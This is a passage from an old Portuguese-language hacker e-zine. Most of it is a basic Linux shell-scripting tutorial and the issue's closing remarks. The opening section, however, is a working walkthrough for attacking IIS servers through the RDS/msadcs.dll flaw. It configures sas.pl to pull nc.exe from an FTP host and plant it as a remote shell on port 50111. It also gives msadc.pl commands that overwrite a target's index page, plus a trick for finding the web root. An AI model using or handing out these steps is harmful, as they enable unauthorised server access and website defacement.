Envie-o o nc puro, ou seja, evie-o com extensao .exe (send nc.exe).
					            _____________
						    -[ Observacoes ]-

(1) Coloque o sas.pl e o msadc.pl dentro do diretorio C:\Perl\Bin. /* winusers */
(2) Edite o arquivo sas.pl para configura-lo (use qualquer editor):
    	
###################################################################
$port = 50111;				# porta q sera aberta no server
$your = "200.211.896.23";		# ftp de onde se encontra o nc
$user = "anonymous";			# usuario para acessar o ftp
$pass = 'password';			# password do usuario
###################################################################

	O sas.pl vai  entrar no  ftp especificado por voce  e  ira pegar
o nc.exe, enviando-o para o servidor especificado. Caso opte por fazer
um servidor de ftp na sua makina, entre em www.gratis.com.br  e  pegue
algum la.Caso opte por cadastrar um site, entre em www.domainvalet.com 
e cadastre um site .com, .org ou .net e envie o nc.exe para la.
	
				   _______________________________________
				--[ Como saber se o host esta vulneravel? ]--

Para saber se uma maquina esta vulneravel ao ataque de rds,voce precisa 
ir no seu browser e digitar:

	http://www.servidor.com.br/msadc/msadcs.dll
	
Caso o arquivo seja encontrado,provavelmente o servidor esta vulneravel.


					-[ Entrando no sistema ]-

							[#1]

	Finalmente a parte mais interessante. Porem, para voce entrar no sistema,
a sua makina ja deve estar com o perl instalado.

Segue a string:

	perl sas.pl www.host-alvo.com 

	
	O sas.pl vai buscar o nc.exe no ftp solicitado e depois vai envia-lo para
o host especificado. Pode ate parecer que eh o sas.pl que faz  todo o  trabalho,
mas nao eh! Depois voce olha no codigo dos dois p/ voce ver como funciona. Se a 
makina realmente estiver vulneravel, o telnet  sera aberto e acessara a  porta 
aberta pelo nc ( aquela que esta no sas.pl, a porta 50111 ) e  voce  caira no: 
c:\winnt\system32

							[#2]

Para voce hackear a page, faca o seguinte:
	perl msadc.pl -h www.host-alvo.com -C "echo FuckZ Admin! > C:\caminhodoroot\index.html"
Mas, como vou saber o caminho do root? Simples, basta voce digitar no seu browser:
	www.host-alvo.com/qualquercoisa.idq
Logo, vai aparecer algo como:
	The IDQ file C:\Inetpub\wwwroot\algumacoisa.idq could not be found
Otimo! Agora sabemos o caminho do root (C:\inetpub\wwwroot). Entao, vamos fazer o seguinte:
	perl msadc.pl -h www.host-alvo.com -C "Hacked por mim! > C:\inetpub\wwwroot\index.html"
Parabens, voce conseguiu! 
	Obs: Certifique-se de qual o index da pagina principal (se eh index.html, ou index.html,
ou default.asp, etc). Por exemplo, voce quer hackear o site www.nasa.com.br e o index da page
principal eh eu.asp, entao, voce deve digitar assim:
	perl msadc.pl -h www.nasa.com.br -C "echo hacked por mim! > c:\inetpub\wwwroot\eu.asp 
Pronto! 

						-[ FINALIZANDO ]-
	
	Como viram, essa eh uma das mil falhas que podemos tirar proveito. Mas o q eu  fico 
mais encabulado, eh porque, mesmo sabendo que o IIS (Infelizmente Ignoramos Seguranca) eh 
uma porcaria, os administradores insistem em usa-lo... 

	Agora, na boa mesmo, nao ache que hackeando com esse metodo  voce  vai se  tornar um
hacker. Nao conte vantagem. Voce tem que hackear coisas que preste. Saiba  que  nao  estou
incetivando ninguem. Voce eh dono do seu nariz, portanto, c voce se meter em  encrenca  eu
nao me responsabilizo por nada.   

											    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.

	







SETOR [16]
==[ Shell Script     ]==
==[ Gotoxy           ]==

Obs: ss = shell script
	
Shellscript eh uma especie dos bats do ms-dos, c lembra? pois eh, porem, shell  script
eh bem mais avancado. Resumindo: eh um arquivo q em conjunto de comandos digitados  em 
sequencia, realiza tarefas no SO, de uma forma mais pratica e otimizada q voce realiza 
diariamente.

Para os que ja estao se familarizando com o linux ou os que ja estao familarizados,nao
terao dificuldades para entender o funcionamente desta linguagem. E mais uma vez aviso:
O ss eh composta basicamente por uma sequencia de comandos do SO, q sao declaradas  na 
ordem em que devem ser executadas. Sendo assim, o unico pre-requesito para utilizar  o
shell script eh ter familaridade com os comandos do lnx.

Como primeiro passo, devemos saber o que eh shell. Trata-se de um programa que atua com
interface entre o nucleo do SO (kernel) e o usuario. Eh atraves do shell que vc utiliza
seu lnx toda vez q efetua logon.

Os shell sao definidos no arquivo de senhas (passwd), localizado no diretorio /etc. Para
voce saber qual tipo de shell esta utilizando, verifique a entrada referente ao login.
Para isso, digite:

[root@localhost]# cat /etc/passwd

Para voce obter a informacao desejada de um determinado usuario, basta digitar conforme 
o exemplo abaixo:
  	
[root@localhost]# cat /etc/passwd | grep gotoxy

Como sabem, o comando cat (gato em ingles), como o proprio nome diz, serve para concatenar
e ler um arquivo (o nome nao tem nada a ve com a funcao, hehehe). E o | (pipe), eh utilizado 
tb para concatenar comandos, q em nosso exemplo esta utilizando o grep como filtro. Enfim, o
resultado final eh a exebicao das linhas q contenham a string "gotoxy". Voce vera algo +/-
assim:

[root@localhost]# cat /etc/passwd | grep gotoxy
[root@localhost]# gotoxy:x:0:1:Gotoxy:/export/home:/bin/sh


Este procedimento eh considerado um ss, pois trata-se de mais de um comando na mesma linha. 
Neste caso, o ss do usuario eh representado no ultimo campo, q sao separados por : (dois 
pontos).

Para sermos mais objetivo para saber qual shell um determinado usuario esta utilizando,basta
voce digitar: 

[root@localhost]# cat /etc/passwd | grep gotoxy | awk - F":"'{print$7}'

Com este comando, vamos apenas obter a shell do usuario, e nao toda aquela linha 
(gotoxy:x:0:1:Gotoxy:/home:/bin/sh). O resultado sera:

/bin/sh

Humm... muito mais simples, nao? Pois eh. Neste caso, o sh eh o bash (Bourne Again Shell)
quem vem sendo utilizado na maioria das distribuicoes de linux. Caso sua distribuicao 
nao vem acompanhado com ele, acesse o site www.rufus.w3.org/linux/RPM para obte-lo.

Existem tres tipos de shell: csh (Shell C), o bash (Bourne Again Shell) e o tcsh (uma
versao melhorada do csh). O bash vem se destacando devido a suas funcoes de acesso aos
comandos mais recentes q podem ser acessados pressionando a seta para cima. Alem disso,
tem uma funcao q permite completar nome de arquivo ou comandos atraves do TAB. 
O csh tb tem suas vantagens. Ele eh o favorito entre os programadores e usuarios 
avancados.

O shell tb pode ser utilizado para definir variaveis. No bash, por exemplo, o  arquivo
profile,localizado no diretorio /etc,eh ececutado assim que o usuario entra no sistema.
Neste arquivos algumas variaveis de ambiente podem ser definidas,como o PATH,o tipo de
terminal e ate mesmo o prompt.

Para voce entrar em uma shell, voce deve digitar o seguinte comando:

[root@localhost]# exec tcsh

Voce pode entrar nos diversos Shells sempre que quiser. Mas,para isso o shell deve estar
instalado em sua distribuicao. Para voce saber quais shells tem no seu sistema, consulte
o diretorio /bin:

[root@localhost]# cd /bin
[root@localhost]# ls *sh*

Sera feito a filtragem de todos os arquivos contendo a expressao sh no diretorio /bin. 
Porem, nem todos os resultados sao shells. 

Vou abordar aqui os comandos do bash, por ser o mais utilizado entre os usuarios.
O ss eh armazenado em arquivos texto e que sempre devem obrigatoriamente comecar
com a seguinte linha:

#!/bin/bash

As linhas iniciadas com o '#' nao sao interpretadas pelo script, execeto a primeira
linha que deve conter a indicacao da shell.

Por exemplo:
---exemplo.sh---

#!/bin/sh
# Este script lista os arquivos #isto nao sera interpretado e nem imprimido quando executado
# Autor: eu 	 		  # mesma coisa --'	         |
# Contatos: eu@anonymous-pontocom.br # mesma coisa --'
echo Listando seus arquivos...  # vai aparecer a msg "Listando os arquivos" no prompt.
ls -l					  # vai listar os arquivos (bah)	
exit 0 				  # indica o fim do processo	

---exemplo.sh---

Para tornar o script acima executavel, digite:
[root@localhost]# chmod a+x exemplo.sh

E depois execute:
[root@localhost]# ./exemplo.sh

Usamos a extensao .sh, embora ela nao seja obrigatoria. O comando que identifica um script
eh a indicacao na primeira linha do arquivo.

Utilize algum editor de texto, como por exemplo o VI, ou o PICO. Enfim, utilize qualquer
um, desde que saiba como utiliza-lo. Recomento o PICO para usuarios menos experientes, 
e o VI para os mais avancados.

Para nao usar nenhum editor, use o cat mesmo. Vamos fazer o exemplo acima utilizando o 
comando cat para isso:


[root@localhost]# cat > exemplo.sh
#!/bin/sh
# Este script lista os arquivos #isto nao sera interpretado e nem imprimido quando executado
# Autor: eu		 		  # mesma coisa --'	         |
# Contatos: eu@anonymous-pontocom.br # mesma coisa --'
echo Listando seus arquivos...  # vai aparecer a msg "Listando os arquivos" no prompt.
ls -l					  # vai listar os arquivos (bah)	
exit 0 				  # indica o fim do processo	



Para finalizar, aperte Ctrl+D. Torne-o executavel e em seguida execute. Voce vera que eh 
a mesma coisa. 

Vou citar os recursos mais utilizados praticamente em qualquer shell. Veja abaixo:

COMANDO					FUNCAO
>						redireciona saida
>>						acrescenta saida no arquivo
<						redireciona a entrada
<<						documento "aqui" (redireciona entrada)
|						canaliza a saida
&						executa processo em segundo caso
;						separa comandos na mesma linha
*						corresponde com quaisquer caracter no nome do arquivo
? 						corresponde com um unico caracter no nome do arquivo
!n						repete o numero de comandos n
[]						corresponde com quaisquer caracteres incluidos
()						executa no subshell
$var						utiliza o valor para a variavel
$$						ID no processo
$0						nome do comando
#						inicia comentario (lembra?)
bg						execucao em segundo plano
break						interrope intrucoes de loop
cd						muda de diretorio (duh)
continue					retorna um loop do programa
echo						Exibe a saida
exec						avalia os argumentos
fg						execucao de primeiro plano
jobs						mostra os trabalhos ativos
kill						termina os trabalhos em execucao


Vou fazer um exemplo abaixo de ss de como se faz para montar seu cdrom e disquete. Esse ss
eh muito util, pois poupa um pouco de trabalho na hora de montar os drives.

---monta.sh---

#!bin/sh
echo "Montando seu drive de diskete e cdrom..."
mount /dev/cdrom /mnt/cdrom; mount /dev/fd0 /mnt/floppy
exit 0

---monta.sh--

Nao precisa explicar neh? O comando mount voce sabe praque serve, certo? Entao, nao tem 
nenhum misterio. Antes de passar para uns programas mais avancados, treine alguns no seu
sistema. Faz alguns ss um pouco uteis, nao faca bobagens.



---------------------------------{ Parte 2 - Shell Script }----------------------------------

Apos voce ter treinando alguns ss mais simples, vamos agora fazer uns mais avancados. No nosso
primeiro exemplo, vamos fazer um ss q procura arkivos core no seu disco e envia um texto com a
localizacao para um email que voce indicar.

Para quem  nao sabe,  o core eh um  arkivo  gerado no sistema quando acontece alguma falha na 
execucao de algum aplicativo no  sistema.  Ele contem o trecho exato da memoria em que o erro
ocorreu.

---core.sh---

#!/bin/sh
find -name "core" > /root/.coretemp
mail -s "CORE FILES" <seuemail@pontocom.br> < /root/.coretemp
exit 0

---core.sh---

Ao executar o script, voce recebera um emaiu com a lozalicao de todos os arquivos core.

Use o cat mesmo. Reelembrando: para tornar um script executavel, digite: chmod a+x nome.sh
Onde:
nome eh o nome do script

E para usar o cat, digite: cat > nome.sh 
Logo apos terminar, aperte Ctrl + D

Vamos fazer um outro script. Neste, vamos fazer um de reiniciar o sendmail (servidor de mail
do linux). Tipo, o exemplo abaixo foi feito em um red hat, caso sua distribuicao tenha dire-
torios diferentes, basta altera-lo para que o script funcione corretamente. 

---sendmail.sh---

#!/bin/sh
clear							#limpa a tela, mesmo que o cls do dos
echo ""
echo Reiniciando o sendmail... espere!
etc/rc.d/init.h/sendmail stop
sleep 3						#aguarda 3 segundos
echo ""
/etc/rc.d/init.d/sendmail start
sleep 2						#aguarda 2 segundos
echo "Verificando se o sendmail esta no ar:"
echo ""
ps -ef | grep sendmail
echo ""
exit 0

---sendmail.sh---

O sleep eh usado para nao causar sobreposicao de processos. Ele espera um determinado tempo
antes de executar a proxima linha de comando. Ex: Se colocarmos sleep 8, o script aguardara 
8 segundos antes de executar a proxima linha.

Bom gente, espero ter passado a materia de uma forma clara. Para voce se aperfeicoar no ss,
basta saber os comandos do linux. Pois, nao adianta voce saber ss se nao tem experinecia no
linux. 

										          Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [17]
==[ Palavras finais ]==
==[ Por Gotoxy      ]==

         galera.. infelizmente chegamos no final desta nossa 1 edicao. At que  os textos 
ficaram massa  neh? Pois .. soh o design que nao ficou 100%.. mas,  vamos dizer   que est 
uns 99,9%.. Os zines estao no nosso site: (www.zinesbr.com). Vamos fazer o mximo  possvel 
para a cada tres meses um zine novo. Mas, isso nao eh uma promessa, ok? Pois,  d  trabalho   
fica escrevendo isso.. Eu, Gotoxy, sou o fundador deste novo zine. Tem o  Kbytes,  que eh o
webmaster do site da Zines-br.  Temos  mente que  gostaram... Portanto, se quiserem  mandar 
alguma matria para enriquece-lo, basta  enviar para  zine@zines-br.com.  Nao  mande emails
pedindo para se tornar um membro da equipe.Os membros atuais foram todos convidados por mim
para fazer parte do ZiNES-BR. Nao somos um cla, somos amigos que gostam de escrever  textos
de ataque\seguranca\etc p/ vcs ficarem informados.Se quiser mandar alguma materia,nos vamos   
analisa-la e logo depois vamos colocar no zine. E  com certeza,  seu nome estara na materia
escrita por voce. A minha funcao eh cuidar do zine, a funcao do Kbytes eh cuidar da pagina,
a funcao do Tankds eh me ajudar (...) Quero dizer  que cada um  aqui tem uma  funcao, entao
se tivermos precisando de alguem para fazer tal coisa, nos avisaremos... 
At a prxima Edicao! 


____________________________________________________________________________________________
''''''''''''''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''''''''''''''

        					  Dvidas? Sugestoes?
                                   	  zine@zines-br.com
						      
						     	 Home Page
						    www.zines-br.com

						        7h3 3nd
// EOF
